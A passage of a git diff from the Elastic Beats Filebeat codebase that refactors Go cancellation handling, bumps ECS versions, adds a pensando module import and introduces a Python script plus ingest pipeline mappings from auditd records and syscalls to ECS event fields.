4w2vyo5wa9WJMJ1gN4G81WEoHPbn7sCfz5TnxMh1BiBznmvO34Nsf8VPDIKdiIENutccCtLl0siZgUPN9I3vac+Pk6DzMLHa9GFXEYhXNxmlkn8PUOJqhT1VIsVG8WalmK30DxvmcPn9pSvXb3BB9KVNGxYLkHRQUgQScYtnr80oV9XOe1qesr6g/vVvd/eNu56C1GDgfzgnMEMbFNAMSy4Q17oO7YFE6YzoeLQ6MmwULUYqZ58DrvM8ywTSEAlg+/Hv4XcO4xe9e5yorUMWgJOTCu6Vq8dK9krUE9N08V6X4RCbNYmepzRxQYCLRrVRfXDNV3iDDHzrTR5mQT6fH9YnAZJ7Q+OmQKkasTyaTmsh/5GSuYNKcySpGyuMndAM25XSbGf/v//4/ylZIqoNkJfhfH31WBD9fjulkwsXQPtv664IbO8DJnm1jOqmDDIUr0Qf27OAOYGsG3pYAjBRLIUHl+aFwbosUegibEcnYJOUxVeUKm+TR3FyMO2cTJWySytm4YsI/fuJi3DkTg3NvkKdPjnIw8Jyp79ExHzqxH/beaZsV6sfPi+Paw9uek8XJ/dF/0TCu/bE4s73DoOmMLcYmSx2w7HZRld7OEBXR2Xeo9Rbj32QqrzndoLmWCVeQXFOg/x/4Kzm2v8xI+BwJvBr3Oogahgo1HAuHH3Ke69Q+F6EHrZxLs4TH0LmW7fW5HHgAgsJSzXPyuxzbc6Y7ofHIllQd0VJCsw0Msu3AGdejgq4JSXKso6BppvOJu2PDgThUbh5jLrX3eUK8+IRmdMy0QSyz+VWwbkyDuYNdo+EL87FtE3YBNMjKoCk0RFcYNXH6EZ+w7EV40oZQeki4KoEE6RlaAWWaSWgjzSeZTPJYL09ICMfxe9cOY1Rwj9td0z6YXUrTvlK+VtpaMPP6PVMHybpLzozv+htWj37AC4pkuYBKdVw0w5Fn6cNm//TTGRkZw35kzECYznIrQHIX0eM8q1wDlU3QObP+MmKwDQr8plR5FrfmOs31iAnt65BkREjtrbBUDgspdiaHkCuC2evivkue1D2eclG+wymhmcphhLnzkQ3hv4O+NsvzrlKZBf7nmJFvR0XxWcQPGvDwjmkK6jZNyCZRkAWZyXFUB1IOBoqV91oQJLUUZBeQZ5OabW/GtGklVuE35EJRpQitXikZA5uOn4pCZkVxRCwRZqgA4bt+b6RyqNqOUV8pnchcvzJcYv5mWfaqDB4Xk1yH3uUCHDgt76UKDIAJIpX1KtbKRUEmUVgRiCvIKbK5kBiCZePpyjX4MRUJC3vKicuv0n5yZavtWTnxlqcMLipx48C6VRdlpgyDDGhcKlj1eBaxAxJ2qyH6KwmKjGO23qwZFPfrk4HiBnRUwXlc9a0mEFxe4iVYgE/FsQaWUT6myKtwNekmuntRVg6Gm6gChlMmJ5kcZk+3c6t1JezwDWJrkNKhum8wv4tiJ70hFdC8Wqn3Xxp/pPUkcsm3kT0WLlMmhnpUwrThTrj0al8ms6g/Kxxnd97bVFoD3G8FFG5Nj3P9lfmmQ7XJT30FS+BBNiZruBlfWFfwMscOhemNXu6hDtG0IG7qsUzydLGQg9Kjd5LdsPolXKJrOp4sNLitcrXI6HgrFVGtsycNagjHLdjbuqUgfbAoW0FuaMbNblZkmnGtmTB2FY7wSpH/OP/wHtYGkn7NQZlkPKiz6Gr2BVcYkN1YxLZMbTIuZuEHqpgrt1wa1x5P1bALHo8nURDuuAQxTo/efQSfe9OQtVvkxYdES6U85PDhQ/5QDFkak/6RVxq+LGT5G1Yc5f25u7f4/g6vR9ifwo0Y1eYqKYmk6ei9Zxqz/XGQ+uBM/J6znOEmrM2RhMm3987hxoKomPpUxm6F4hKXDRcFy2HjhyJFPk7JM6XyMcsuy6L4QUtkzUsYr9xJKnTb/p4zCNAIQ+4eipsbzRemKvPrNR1c06X5VcsJjx9Hib+bie1A89f2EcjjBMXSWmo+/X7AiaydJG2CxZgpRYcNfs5rNnsKwl2zWRu7fBn9BJtpoF2Bv1vrQstAdM+FqZ/K+Lp2bpIH7FtLCyiCshbL8QQS3pN1nIIUU9RgGDGasEzV5obaqYtNfmgrrZpFQEBwUFvfXhWFGS0l2o4yQZcJ/Kf1b9ds9u+vyb8BHf+9Ff3l/wUAAP//C1WquA==" } diff --git a/filebeat/include/list.go b/filebeat/include/list.go index 519d0e715819..e4c1396d973b 100644 --- a/filebeat/include/list.go +++ b/filebeat/include/list.go @@ -45,6 +45,7 @@ import ( _ "github.com/elastic/beats/v7/filebeat/module/nats" _ "github.com/elastic/beats/v7/filebeat/module/nginx" _ "github.com/elastic/beats/v7/filebeat/module/osquery" + _ "github.com/elastic/beats/v7/filebeat/module/pensando" _ "github.com/elastic/beats/v7/filebeat/module/postgresql" _ "github.com/elastic/beats/v7/filebeat/module/redis" _ "github.com/elastic/beats/v7/filebeat/module/santa" diff --git a/filebeat/input/filestream/filestream.go b/filebeat/input/filestream/filestream.go index 1a559c67e060..908d85581459 100644 --- a/filebeat/input/filestream/filestream.go +++ b/filebeat/input/filestream/filestream.go @@ -18,18 +18,19 @@ package filestream import ( - "context" "errors" "io" "os" "time" + "github.com/elastic/go-concert/ctxtool" + "github.com/elastic/go-concert/timed" + "github.com/elastic/go-concert/unison" + input "github.com/elastic/beats/v7/filebeat/input/v2" "github.com/elastic/beats/v7/libbeat/common/backoff" "github.com/elastic/beats/v7/libbeat/common/file" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/go-concert/ctxtool" - "github.com/elastic/go-concert/unison" ) var ( @@ -39,10 +40,9 @@ var ( // logFile contains all log related data type logFile struct { - file *os.File - log *logp.Logger - ctx context.Context - cancelReading context.CancelFunc + file *os.File + log *logp.Logger + readerCtx ctxtool.CancelContext closeAfterInterval time.Duration closeOnEOF bool @@ -55,7 +55,7 @@ type logFile struct { offset int64 lastTimeRead time.Time backoff backoff.Backoff - tg unison.TaskGroup + tg *unison.TaskGroup } // newFileReader creates a new log instance to read log sources @@ -71,6 +71,9 @@ func newFileReader( return nil, err } + readerCtx := ctxtool.WithCancelContext(ctxtool.FromCanceller(canceler)) + tg := unison.TaskGroupWithCancel(readerCtx) + l := &logFile{ file: f, log: log, @@ -83,16 +86,10 @@ func newFileReader( offset: offset, lastTimeRead: time.Now(), backoff: backoff.NewExpBackoff(canceler.Done(), config.Backoff.Init, config.Backoff.Max), - tg: unison.TaskGroup{}, + readerCtx: readerCtx, + tg: tg, } - l.ctx, l.cancelReading = ctxtool.WithFunc(ctxtool.FromCanceller(canceler), func() { - err := l.tg.Stop() - if err != nil { - l.log.Errorf("Error while stopping filestream logFile reader: %v", err) - } - }) - l.startFileMonitoringIfNeeded() return l, nil @@ -103,7 +100,7 @@ func newFileReader( func (f *logFile) Read(buf []byte) (int, error) { totalN := 0 - for f.ctx.Err() == nil { + for f.readerCtx.Err() == nil { n, err := f.file.Read(buf) if n > 0 { f.offset += int64(n) @@ -154,35 +151,18 @@ func (f *logFile) startFileMonitoringIfNeeded() { } func (f *logFile) closeIfTimeout(ctx unison.Canceler) { - timer := time.NewTimer(f.closeAfterInterval) - defer timer.Stop() - - for { - select { - case <-ctx.Done(): - return - case <-timer.C: - f.cancelReading() - return - } + if err := timed.Wait(ctx, f.closeAfterInterval); err == nil { + f.readerCtx.Cancel() } } func (f *logFile) periodicStateCheck(ctx unison.Canceler) { - ticker := time.NewTicker(f.checkInterval) - defer ticker.Stop() - - for { - select { - case <-ctx.Done(): - return - case <-ticker.C: - if f.shouldBeClosed() { - f.cancelReading() - return - } + timed.Periodic(ctx, f.checkInterval, func() error { + if f.shouldBeClosed() { + f.readerCtx.Cancel() } - } + return nil + }) } func (f *logFile) shouldBeClosed() bool { @@ -267,6 +247,8 @@ func (f *logFile) handleEOF() error { // Close func (f *logFile) Close() error { - f.cancelReading() - return f.file.Close() + f.readerCtx.Cancel() + err := f.file.Close() + f.tg.Stop() // Wait until all resources are released for sure. + return err } diff --git a/filebeat/input/filestream/input.go b/filebeat/input/filestream/input.go index 8d40284c3661..8f21cb505cee 100644 --- a/filebeat/input/filestream/input.go +++ b/filebeat/input/filestream/input.go @@ -159,7 +159,7 @@ func (inp *filestream) Run( return err } - _, streamCancel := ctxtool.WithFunc(ctxtool.FromCanceller(ctx.Cancelation), func() { + _, streamCancel := ctxtool.WithFunc(ctx.Cancelation, func() { log.Debug("Closing reader of filestream") err := r.Close() if err != nil { diff --git a/filebeat/input/v2/compat/compat.go b/filebeat/input/v2/compat/compat.go index 67bc9c7ac13b..ad2d2a16e8ff 100644 --- a/filebeat/input/v2/compat/compat.go +++ b/filebeat/input/v2/compat/compat.go @@ -21,6 +21,7 @@ package compat import ( + "context" "fmt" "sync" @@ -31,7 +32,7 @@ import ( "github.com/elastic/beats/v7/libbeat/cfgfile" "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/go-concert" + "github.com/elastic/go-concert/ctxtool" ) // factory implements the cfgfile.RunnerFactory interface and wraps the @@ -52,7 +53,7 @@ type runner struct { log *logp.Logger agent *beat.Info wg sync.WaitGroup - sig *concert.OnceSignaler + sig ctxtool.CancelContext input v2.Input connector beat.PipelineConnector } @@ -94,7 +95,7 @@ func (f *factory) Create( id: id, log: f.log.Named(input.Name()), agent: &f.info, - sig: concert.NewOnceSignaler(), + sig: ctxtool.WithCancelContext(context.Background()), input: input, connector: p, }, nil @@ -126,7 +127,7 @@ func (r *runner) Start() { } func (r *runner) Stop() { - r.sig.Trigger() + r.sig.Cancel() r.wg.Wait() r.log.Infof("Input '%v' stopped", r.input.Name()) } diff --git a/filebeat/input/v2/input-cursor/input.go b/filebeat/input/v2/input-cursor/input.go index 2efc9ea93a80..c8f770336ed3 100644 --- a/filebeat/input/v2/input-cursor/input.go +++ b/filebeat/input/v2/input-cursor/input.go @@ -117,7 +117,7 @@ func (inp *managedInput) Run( // refine per worker context inpCtx := ctx inpCtx.ID = ctx.ID + "::" + source.Name() - inpCtx.Logger = ctx.Logger.With("source", source.Name()) + inpCtx.Logger = ctx.Logger.With("input_source", source.Name()) if err = inp.runSource(inpCtx, inp.manager.store, source, pipeline); err != nil { cancel() diff --git a/filebeat/input/winlog/input.go b/filebeat/input/winlog/input.go index ced7a62b228d..08b15a84b4b4 100644 --- a/filebeat/input/winlog/input.go +++ b/filebeat/input/winlog/input.go @@ -98,7 +98,7 @@ func (eventlogRunner) Run( // setup closing the API if either the run function is signaled asynchronously // to shut down or when returning after io.EOF - cancelCtx, cancelFn := ctxtool.WithFunc(ctxtool.FromCanceller(ctx.Cancelation), func() { + cancelCtx, cancelFn := ctxtool.WithFunc(ctx.Cancelation, func() { if err := api.Close(); err != nil { log.Errorf("Error while closing Windows Eventlog Access: %v", err) } diff --git a/filebeat/inputsource/common/dgram/server.go b/filebeat/inputsource/common/dgram/server.go index ecb4844ed673..41a028f7d33a 100644 --- a/filebeat/inputsource/common/dgram/server.go +++ b/filebeat/inputsource/common/dgram/server.go @@ -72,26 +72,29 @@ func (l *Listener) Run(ctx context.Context) error { l.log.Info("Started listening for " + l.family.String() + " connection") for ctx.Err() == nil { - conn, err := l.listener() - if err != nil { - l.log.Debugw("Cannot connect", "error", err) - continue - } - connCtx, connCancel := ctxtool.WithFunc(ctx, func() { - conn.Close() - }) - - err = l.run(connCtx, conn) - if err != nil { - l.log.Debugw("Error while processing input", "error", err) - connCancel() - continue - } - connCancel() + l.doRun(ctx) } return nil } +func (l *Listener) doRun(ctx context.Context) { + conn, err := l.listener() + if err != nil { + l.log.Debugw("Cannot connect", "error", err) + return + } + + connCtx, connCancel := ctxtool.WithFunc(ctx, func() { + conn.Close() + }) + defer connCancel() + + err = l.connectAndRun(connCtx, conn) + if err != nil { + l.log.Debugw("Error while processing input", "error", err) + } +} + func (l *Listener) Start() error { l.log.Info("Started listening for " + l.family.String() + " connection") @@ -106,12 +109,14 @@ func (l *Listener) Start() error { }) defer connCancel() - return l.run(ctxtool.FromCanceller(connCtx), conn) + return l.connectAndRun(ctxtool.FromCanceller(connCtx), conn) }) return nil } -func (l *Listener) run(ctx context.Context, conn net.PacketConn) error { +func (l *Listener) connectAndRun(ctx context.Context, conn net.PacketConn) error { + defer l.log.Recover("Panic handling datagram") + handler := l.connect(*l.config) for ctx.Err() == nil { err := handler(ctx, conn) diff --git a/filebeat/inputsource/common/streaming/listener.go b/filebeat/inputsource/common/streaming/listener.go index 16e708f554bd..11e60a35b7bf 100644 --- a/filebeat/inputsource/common/streaming/listener.go +++ b/filebeat/inputsource/common/streaming/listener.go @@ -41,8 +41,7 @@ type Listener struct { family inputsource.Family wg sync.WaitGroup log *logp.Logger - ctx context.Context - cancel context.CancelFunc + ctx ctxtool.CancelContext clientsCount atomic.Int handlerFactory HandlerFactory listenerFactory ListenerFactory @@ -111,9 +110,9 @@ func (l *Listener) initListen(ctx context.Context) error { return err } - l.ctx, l.cancel = ctxtool.WithFunc(ctx, func() { + l.ctx = ctxtool.WrapCancel(ctxtool.WithFunc(ctx, func() { l.Listener.Close() - }) + })) return nil } @@ -171,7 +170,7 @@ func (l *Listener) run() { // Stop stops accepting new incoming connections and Close any active clients func (l *Listener) Stop() { l.log.Info("Stopping" + l.family.String() + "server") - l.cancel() + l.ctx.Cancel() l.wg.Wait() l.log.Info(l.family.String() + " server stopped") } diff --git a/filebeat/module/apache/access/config/access.yml b/filebeat/module/apache/access/config/access.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/apache/access/config/access.yml +++ b/filebeat/module/apache/access/config/access.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/apache/error/config/error.yml b/filebeat/module/apache/error/config/error.yml index cb319d01efe4..2bd2a117d1c7 100644 --- a/filebeat/module/apache/error/config/error.yml +++ b/filebeat/module/apache/error/config/error.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/auditd/_meta/fields.yml b/filebeat/module/auditd/_meta/fields.yml index e84497723a89..3f3384182868 100644 --- a/filebeat/module/auditd/_meta/fields.yml +++ b/filebeat/module/auditd/_meta/fields.yml @@ -36,26 +36,6 @@ description: > Name of the group. - - name: effective - type: group - description: Effective user information. - fields: - - name: id - type: keyword - description: Effective user ID. - - name: name - type: keyword - description: Effective user name. - - name: group - type: group - description: Effective group information. - fields: - - name: id - type: keyword - description: Effective group ID. - - name: name - type: keyword - description: Effective group name. - name: filesystem type: group diff --git a/filebeat/module/auditd/fields.go b/filebeat/module/auditd/fields.go index ab6f0d1ad932..e9daa6a4a4b1 100644 --- a/filebeat/module/auditd/fields.go +++ b/filebeat/module/auditd/fields.go @@ -32,5 +32,5 @@ func init() { // AssetAuditd returns asset data. // This is the base64 encoded gzipped contents of module/auditd. func AssetAuditd() string { - return "eJzsWk+P27YTve+nGOR3+fUQNaceXKBAgTRAgDQF2vTQ04ImRzKxFEchR/aqn74gJfmPTNkW10Eu68MCK5vz3hs+kjO038ITdisQrdKsHgBYs8EVvPk1PnjzAKDQS6cb1mRX8MsDAMDvpFqDUJKDRjivbTUEAEOVLx4A/IYcP0qypa5WwK7FB4BSo1F+9RBjvAUralxB69HFBwDcNbiCylHbDE9ORhyPYnS1tsLs3xhHP2G3I6eOnif4j68vQxQgB8wdKNxqiUAWdhstN8AbjPxAe2jQlRQ+XsXHtPbotqhASNZbzV1xTjLm5Izhsb5jjcfExghanTyeF3lFaHj9YTHorFvDujEIrdVfWwSt0LIuNToPVO4lF0k+4e8CRvgs6ibYSZg1Ol7G969goYgYaBuqtD0lmGQYs1vcM29/T/MUfR9oRKzglvCP7zxj/WNjBAefpPPXs1uYxSv8wutzzFJ5YJVwI5YlBq/iVUeeAP42DhtWgg3qRHivuGjiGQvPC72E+vF9kQh9lse84CFMKvw0LXPpmo3e+2MmY99q4U/hT1OXvZQvYvQZPHNcqQ32y+J1E/xWm2CK4OseOLcH0s7uqw14NeOrGb+nGb3Yono146sZv5cZT/oUNduEzSB8iMaE0lEdI086QEh4dwQ0VC0rQk91TZE/ads+9/ghdAGfiUEYM+CDcAiKZFujZVSwQYewRilaPykfN9j1H+6sqLUEYRVshetg3Q3hcYuWI+PL1e/RkWPUo2jPLHdl2j7sPR0RPfBG+9CGxt7TqIHOx/fB7GrvuVjPNk6Hf+ksaIwRo84sX9zdm6rF3Z5qAV9GmwTiUlhYY88/RdYJiVC23DrcR6aDyvAIdDS1dsP64w7kRtgKPfzf6KfpMoIw6xRbeEfEP6SzECbMo7/zfHn0XpP9BjN2X65hwg5cC/jIk4kC1gjiLGjUwTSZsHV3HCwpwePXFq1Mb3mGbLVM3MFi/VIdw4Nt6/XcsaAZ64VJDDh9yLCzxgCgLYghqfM4y2HCqH6LAW2VloLRDxdU8S1qedzdmViYKa8iEVX78VPaw7/o6O1aeFQ/g4CtMG08Lt5BjcJ60Dyao9TOcwya1sfcLTq5Sm31rPIv/0A7XMgd38O51tqwghtHlRO1h2lbvT/V3i1PdS9QuCqeFeN+0x/eIIUxM1BKuaRw3SzS/CfWxBjDoQ8pF3yiXZK1ofG2VTz80mRcQ2e11IXVdAOfJlZaF9aPuVcCPpEM/kXekXsa8zCDeT+ZPWpSZXq6pUwjC6PFdB9pBG/6W+5UZVfryome13BJfg7XzNSr82iNIxkSdz7yJrwXAOYhurMj7Bpgv8lSy5KycupQklOPASYLWcgAkAFcIZ2tiblrxXRheRxNkmVt0fJjwluX1RwUeWqdxKJCKq7GuyTxlFhr2XWP2tOjJHUXalcj3krOkBSJ6csgdSHSrWQcVprsnebvcrCbJ09zdy9DXQi1MEP3s9L1gHPUTj76v7ERXaOhHexCW2mJ+8MGQ7EGPxXPsG65f8+zNgbWGKsXalojGNVMQeHkZuG+tCHPRRinGWWowXM2p8UbfzzXZm5VbkE87zZvQszCEpnyYjvxEpGJnnoBcBZk6TPFHr6zeYni0mdKPoLPAsZM2fsvR1+iGjNFH8CzYHOnOt4/v0Rv7iT3wFmQlKk1fvHzEq2UqbUHzoKUVE9vC26twzM7DXxeWg2PgPiMsmWxNjmwiR/z3JzfmbG3wNZ+2iZeQ6zRe1HlSPROLsQa6pWhB86AVH5pk6rQs7b9LxVuw/0vAAD//zgi5vg=" + return "eJzsWk+P27YTvftTDPK7/HqImlMPLlCgQBEgQJoC7fbQ04ImRzKxFEchh/aqn74gJfmvZFtcB7nYhwAri/Pem3kkh3Tewwu2SxBBaVYLANZscAnvfk0P3i0AFHrpdMOa7BJ+WQAA/E4qGISSHDTCeW2rPgAYqnyxAPBrcvwsyZa6WgK7gAuAUqNRfrlIMd6DFTUuIXh06QEAtw0uoXIUmv7J0YjDUYyu1laY3RfD6Bdst+TUwfMR/sPnqY8C5IC5BYUbLRHIwnat5Rp4jYkfaA8NupLi61V6TCuPboMKhGS90dwW5yRTTs4YHuo71HhIbIig1dHjaZFXhMbPHxajzjoY1o1BCFZ/DQhaoWVdanQeqNxJLkb5xH9nMMJXUTfRTsKs0PE8vn9FCyXESNtQpe0xwVGGKbvFPfP292meku8jjYQV3RL/8K1nrH9sjODok/H8dexmZvEKv/j5krJU7lkVi3M7ltpgx/LhyW/lyTGCD0sOljzFpq3dLf7wMOPDjN/TjF5sUD3M+DDj9zLjUduoJnviCYSPyZhQOqpT5JOGHEa8OwAaqq76/oKuU+TP2obXDj+GLuALMQhjenwQDkGRDDVaRgVrdAgrlCL440TzGtvu5daKWksQVsFGuBZWbR8eN2g5MS5unKNk1LMIZ5a7UraPO08nRA+81j6eCtJRwKiezqffotnVznPp7NA4Hf+ks6ApRoo6MX1xe2+qFrc7qgU8DTaJxKWwsMKO/xhZJyRCGTg43EWmvcr4CHQytXb9/OMW5FrYCj383+iX02kEseqUTlSOiH8Yz0IsmEd/53p59F6T/QYVuy/XWLA91wI+8UmhgDWCOAuadDCdFGzVHgYbleDxa0Arx5c8Q7aaJ25vsW6qDuHBhno1tS1oxnpmEiNOFzKurCkAaAuiT+o0znyYOKpbYkBbpaVg9P19QfqKAg+rOxMLc8qrGImq/fCW9vAvOnq/Eh7VzyBgI0xI28UHqFFYD5oHc5TaeU5Bx/Uxt7N2rlJbPan86R8I/f3I4bWIC9bGGdw4qpyoPdDE3BAf5qe6EyhclfaKYb3pNm+QwpgJKKXcqHDdzNL8J9bEmMKhjykXfKRdkrUoOcqPm984GdfQWS91YTbdwKdJndaF+WPulYDPJKN/kbfkXoY8TGDeT2aHOqpyvNxSjiMLo8XpOtIIXneXjmOdXa0rJzpe/Z3lOVwz0a9OozWOZEzc+cib8N4AmIfozrawa4DdIkuBJWXl1KEkp54jTBaykBEgA7hCOpsT4w0wTDSWh9EkWdYWLT+PeOuymr0iT8FJLCqk4mq8SxKPiQXLrn3Wnp4lqbtQuxrxVnKGpBgpXwapC5FuJeOw0mTvVL/LwW4unub2Xoa6EGpmhu5npesBp6gdvfq/4SC6QkNb2MZjpSXuNhuMzRr8VLzCKnD3nWdtDKwwdS/UBCMY1URD4eR65rq0Js9FHKcZZezBcxan2Qt/2tcmblVuQTw/bd6EmIUlMuWl48RbRI6cqWcAZ0GWPlPs/jebtygufabkA/gsYMyUjWUZG+sNvkU1Zoreg2fB5pY63T+/RW9ukTvgLEjK1Jp++HmLVsrU2gFnQUqqT28Lbu3DM08a+Dq3Gx4A8RVlYLEyObAj/7fi5vxOjL0Ftvanx8RriDV6L6ocid7JmVh9v9KfgTMglZ97SFXoWdsU90bc/wIAAP//+a0+9A==" } diff --git a/filebeat/module/auditd/log/config/log.yml b/filebeat/module/auditd/log/config/log.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/auditd/log/config/log.yml +++ b/filebeat/module/auditd/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/auditd/log/ingest/gen-ecs-mappings.py b/filebeat/module/auditd/log/ingest/gen-ecs-mappings.py new file mode 100644 index 000000000000..55dba3880852 --- /dev/null +++ b/filebeat/module/auditd/log/ingest/gen-ecs-mappings.py @@ -0,0 +1,176 @@ +#!/usr/bin/env python3 + +# This script generates auditd to ECS mappings from github.com/elastic/go-libaudit +# +# Usage: ./gen-ecs-mappings.py ~/go/src/github.com/elastic/go-libaudit +# +# It will output to stdout the `params` section for the script processor in the ingest pipeline. +import copy +import os +import sys +import yaml +from collections import defaultdict +from shlex import quote +from subprocess import check_call, call, check_output + + +def extract_object(name: str, source: dict) -> dict: + r = {} + for k, v in source.items(): + if k == 'primary' or k == 'secondary': + r[name + '.' + k] = v + elif k == 'what' or k == 'path_index' or k == 'how': + pass + else: + raise Exception('Unexpected object key: ' + k) + return r + + +def map_object(instance: dict, context: str, mappings: dict): + for k, v in instance.items(): + if k not in mappings: + raise Exception('Unexpected key "{}" while parsing {}'.format(k, context)) + mappings[k](k, v) + + +def convert_mappings(m: dict) -> dict: + event = {} + objects = { + # Default values for subject (actor), may be overridden. + 'subject.primary': ['auid'], + 'subject.secondary': ['uid'], + } + extra = {} # TODO: Unused (sets client.ip) + mappings = [] + has_fields = [] + + def store_condition(k: str, v: list): + nonlocal has_fields + has_fields = v + + def store_event(k: str, v: list): + if not isinstance(v, list): + v = [v] + event[k] = v + + def ignore(k, v): + pass + + def make_store_field(name: str): + def store(k: str, v: any): + extra[name] = v + return store + + def store_ecs(k: str, v: dict): + def store_mappings(k: str, v: list): + if not isinstance(v, list): + raise Exception('ecs.mappings must be a list, not ' + repr(v)) + nonlocal mappings + mappings = v + + map_object(v, 'ecs', { + 'type': store_event, + 'category': store_event, + 'mappings': store_mappings, + }) + + def store_entity(basek: str, basev: dict): + def save(k: str, v: any): + if not isinstance(v, list): + v = [v] + objects[basek + '.' + k] = v + + map_object(basev, basek, { + **dict.fromkeys(['primary', 'secondary'], save), + **dict.fromkeys(['what', 'path_index'], ignore) + }) + + map_object(m, 'mapping', { + 'action': store_event, + 'ecs': store_ecs, + 'source_ip': make_store_field('source.ip'), + 'has_fields': store_condition, + **dict.fromkeys(['object', 'subject'], store_entity), + **dict.fromkeys(['syscalls', 'record_types', 'how', 'description'], ignore), + }) + d = { + 'event': event, + } + + if len(mappings) > 0: + d['copy'] = [] + for mp in mappings: + ref = mp['from'] + if ref in objects: + source = objects[ref] + else: + parts = ref.split('.') + if len(parts) != 2: + raise Exception("Don't know how to apply ecs mapping for {}".format(ref)) + if parts[0] == 'uid' or parts[0] == 'data': + source = [parts[1]] + else: + raise Exception("Don't know how to apply ecs mapping for {}".format(ref)) + d['copy'].append({ + 'from': source, + 'to': mp['to'] + }) + + if len(has_fields) > 0: + d['has_fields'] = has_fields + return d + + +class DefaultDict(defaultdict): + def __init__(self, factory): + super(DefaultDict, self).__init__(factory) + + def append(self, keys, obj): + if isinstance(keys, str): + keys = [keys] + for key in keys: + self[key].append(copy.deepcopy(obj)) + + +if __name__ == '__main__': + if len(sys.argv) != 2: + print('Usage: {} '.format(sys.argv[0])) + sys.exit(1) + repo_path = sys.argv[1] + if not os.path.isdir(repo_path): + raise Exception('Path to go-libaudit is not a directory: ' + repo_path) + git_path = repo_path + "/.git" + if not os.path.isdir(git_path): + raise Exception('go-libaudit directory doesn\'t contain a git repository: ' + git_path) + norms_path = repo_path + "/aucoalesce/normalizations.yaml" + if not os.path.isfile(norms_path): + raise Exception('go-libaudit repository doesn\'t contain the normalizations file: ' + norms_path) + revision = check_output('git --work-tree={} --git-dir={} describe --tags'.format(quote(repo_path), + quote(git_path)), shell=True).decode('utf8').strip() + with open(norms_path, 'r') as f: + norms = yaml.full_load(f) + types = DefaultDict(list) + syscalls = DefaultDict(list) + for entry in norms['normalizations']: + proto = convert_mappings(entry) + # TODO: Correctly check for emptyness (condition field?) + if len(proto) == 0: + continue + if 'syscalls' in entry: + syscalls.append(entry['syscalls'], proto) + + if 'record_types' in entry: + types.append(entry['record_types'], proto) + +if 'SYSCALL' in types: + raise Exception('SYSCALL cannot be specified in record_types') + +print('# Auditd record type to ECS mappings') +print('# AUTOGENERATED FROM go-libaudit {}, DO NOT EDIT'.format(revision)) +yaml.safe_dump({ + 'params': { + 'types': dict(types), + 'syscalls': dict(syscalls), + } +}, sys.stdout) +print('# END OF AUTOGENERATED') diff --git a/filebeat/module/auditd/log/ingest/pipeline.yml b/filebeat/module/auditd/log/ingest/pipeline.yml index 13f91a4b38b0..826761837d52 100644 --- a/filebeat/module/auditd/log/ingest/pipeline.yml +++ b/filebeat/module/auditd/log/ingest/pipeline.yml @@ -27,18 +27,13 @@ processors: target_field: auditd.log - kv: field: auditd.log.sub_kv - field_split: "\\s+" + field_split: "\\s+(?=[^\\s]+=)" value_split: "=" target_field: auditd.log ignore_missing: true -- remove: - field: auditd.log.kv - ignore_failure: true -- remove: - field: auditd.log.sub_kv - ignore_failure: true -- remove: +- rename: field: message + target_field: event.original ignore_failure: true - date: field: auditd.log.epoch @@ -46,9 +41,6 @@ processors: formats: - UNIX ignore_failure: true -- remove: - field: auditd.log.epoch - ignore_failure: true - rename: ignore_failure: true field: auditd.log.old-auid @@ -179,83 +171,1743 @@ processors: - script: lang: painless ignore_failure: true + # Auditd record type to ECS mappings + # AUTOGENERATED FROM go-libaudit v2.2.0, DO NOT EDIT params: - CONFIG_CHANGE: - category: - - configuration - type: - - change - DAEMON_CONFIG: - category: - - configuration - type: - - change - DAEMON_RECONFIG: - category: - - configuration - type: - - info - USYS_CONFIG: - category: - - configuration - type: - - change - NETFILTER_CFG: - category: - - configuration - type: - - change - FEATURE_CHANGE: - category: - - configuration - type: - - change - MAC_CONFIG_CHANGE: - category: - - configuration - type: - - change - MAC_POLICY_LOAD: - category: - - configuration - type: - - access - MAC_STATUS: - category: - - configuration - type: - - change - USER_MAC_CONFIG_CHANGE: - category: - - configuration - type: - - change - USER_MAC_POLICY_LOAD: - category: - - configuration - type: - - access - USER_AUTH: - category: - - authentication - type: - - info - KERN_MODULE: - category: - - driver - type: - - info - SOFTWARE_UPDATE: - category: - - package - type: - - info + syscalls: + '*': + - event: + category: + - process + type: + - info + accept: + - event: + action: + - accepted-connection-from + category: + - network + type: + - connection + - start + accept4: + - event: + action: + - accepted-connection-from + category: + - network + type: + - connection + - start + access: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + adjtimex: + - event: + action: + - changed-system-time + category: + - host + type: + - change + bind: + - event: + action: + - bound-socket + category: + - network + type: + - start + brk: + - event: + action: + - allocated-memory + category: + - process + type: + - info + chmod: + - event: + action: + - changed-file-permissions-of + category: + - file + type: + - change + chown: + - event: + action: + - changed-file-ownership-of + category: + - file + type: + - change + clock_settime: + - event: + action: + - changed-system-time + category: + - host + type: + - change + connect: + - event: + action: + - connected-to + category: + - network + type: + - connection + - start + creat: + - event: + action: + - opened-file + category: + - file + type: + - creation + delete_module: + - event: + action: + - unloaded-kernel-module + category: + - driver + type: + - end + execve: + - event: + action: + - executed + category: + - process + type: + - start + execveat: + - event: + action: + - executed + category: + - process + type: + - start + faccessat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + fallocate: + - event: + action: + - opened-file + category: + - file + type: + - change + fchmod: + - event: + action: + - changed-file-permissions-of + category: + - file + type: + - change + fchmodat: + - event: + action: + - changed-file-permissions-of + category: + - file + type: + - change + fchown: + - event: + action: + - changed-file-ownership-of + category: + - file + type: + - change + fchownat: + - event: + action: + - changed-file-ownership-of + category: + - file + type: + - change + fgetxattr: + - event: + action: + - 